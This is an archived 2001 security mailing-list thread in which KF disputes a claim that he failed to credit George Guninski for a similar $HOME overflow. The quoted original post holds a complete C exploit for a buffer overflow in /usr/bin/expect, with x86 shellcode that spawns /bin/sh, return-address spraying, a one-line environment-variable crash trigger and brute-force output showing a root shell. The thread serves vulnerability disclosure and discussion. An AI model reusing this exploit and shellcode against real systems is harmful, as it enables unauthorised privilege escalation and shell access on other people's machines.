Can you refer me to the post from George which documents this? If you are refering to $HOME buffer overflow in SunOS 5.8 x86 Description: There is a buffer overflow in SunOS 5.8 x86 with $HOME and /usr/bin/mail leading to egid=mail. If so I hardly see how I should George Credit based on only the fact that they share a common variable (HOME) which happens to be unchecked... George and I may be using a similar technique to find the overflow with in these applications but I don't see how they are related. On a side not I forgot to mention that Expect is SUID on Cray. -KF "Kevin J. Menard, Jr." wrote: > > Hey KF, > > This is pretty much the same thing George Guninski reported to BugTraq. You > should give people proper credit where due. > > -- > Kevin > > Tuesday, June 05, 2001, 5:04:23 AM, you wrote: > > K> I have found an overflow in and coded the exploit code for several > K> versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am > K> unable to think of a situation where this would be useful due to the > K> fact that expect is not suid...can anyone help me determine if this is > K> exploitable to obtain root? Perhaps a suid expect script could be > K> exploited? or maybe something like suid kppp which calls expect as a > K> helper program? > > K> [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'` > K> [root@linux elguapo]# expect > K> Segmentation fault (core dumped) > > K> -Kevin Finisterre > K> dotslashat_private > K> --------------54785D81E19EEAA4D65A5A40 > K> Content-Transfer-Encoding: 7bit > K> Content-Type: text/plain; charset=us-ascii; > K> name="expect.c" > K> Content-Disposition: inline; > K> filename="expect.c" > > K> //krfinisterreat_private or dotslashat_private > K> //this is output from my brute script... > K> //722 > K> //Stack pointer: 0xbffffa18 > K> // Offset: 0x2d3 > K> // Return addr: 0xbffff745 > K> //stack/brute.sh: line 11: 2190 Illegal instruction (core dumped) > K> $3 > K> $L > K> //723 > K> //Stack pointer: 0xbffffa18 > K> // Offset: 0x2d4 > K> // Return addr: 0xbffff744 > K> //sh-2.04# > K> //note that I was root when I ran this ... expect is not suid > > K> #define BUFFERSIZE 533 > > K> unsigned long sp(void) > K> { > K> __asm__("movl %esp, %eax"); > K> } > > K> int main(int argc,char **argv) > K> { > K> char hell[] = > K> "\x29\xc0" > K> "\x29\xc0" > K> "\xb0\x47" > K> "\x29\xdb" > K> "\xb3\x0c" > K> "\x89\xd9" > K> "\xcd\x80" > K> "\x5e" > K> "\x29\xc0" > K> "\x88\x46\x07" > K> "\x89\x46\x0c" > K> "\x89\x76\x08" > K> "\xb0\x0b" > K> "\x87\xf3" > K> "\x8d\x4b\x08" > K> "\x8d\x53\x0c" > K> "\xcd\x80" > K> "\xe8\xe3\xff\xff\xff" > K> "\x2f\x62\x69\x6e\x2f\x73\x68"; > K> int i; > K> int offset; > K> long esp; > K> long ret; > K> long *addr_ptr; > K> char *buffer, *ptr; > K> offset = atoi(argv[1]); > K> esp = sp(); > K> ret = esp-offset; > > K> if(!(buffer = malloc(BUFFERSIZE))) > K> { > K> printf("oops\n"); > K> exit(-1); > K> } > > K> ptr = buffer; > K> addr_ptr = (long *)ptr; > K> for (i=0; i<BUFFERSIZE; i+=4) > K> *(addr_ptr++) = ret; > > K> for (i=0; i<BUFFERSIZE/2; i++) > K> buffer[i] = '\xeb02'; > > K> ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2)); > K> for(i=0; i<strlen(hell); i++) > K> *(ptr++) = hell[i]; > > K> buffer[BUFFERSIZE-1] = 0; > > K> setenv("HOME", buffer, 1); > K> execlp("/usr/bin/expect", 0); > K> } > > K> --------------54785D81E19EEAA4D65A5A40--
This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 23:25:21 PDT